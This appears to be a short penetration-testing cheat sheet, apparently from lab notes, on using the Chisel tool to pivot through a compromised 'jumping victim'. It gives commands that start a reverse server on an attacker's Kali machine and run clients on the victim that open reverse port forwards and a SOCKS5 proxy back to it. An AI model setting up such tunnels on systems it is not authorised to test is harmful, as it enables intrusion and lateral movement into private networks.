Chisel
Compile
Linux
We can cross-compile chisel for other operating systems and architectures with the Golang compiler. e.g. 64-bit windows
Windows
Setup
Server
Chisel SOCKS proxy server
Kali SSH SOCKS proxy server
Client (transfer complied .exe to jumping victim)
providing the IP address and port of the server instance of chisel
Usage
We can also use chisel with the classic reverse SSH tunnel syntax by specifying the -reverse option instead of --socks5 on the server side.
Start server listening on 8000:
./chisel server -p 8000 --reverse
From victim:
Command
Notes
chisel client 192.168.119.120:8000 R:8080:127.0.0.1:80
Listen on Kali 80, forward to jumping victim local port 80
chisel client 192.168.119.120:8000 R:4444:192.168.120.10:80
Listen on Kali 4444, forward to next victim port 80
chisel client 192.168.119.120:8000 R:socks
Create SOCKS5 listener on 1080 on Kali, proxy through client
Last updated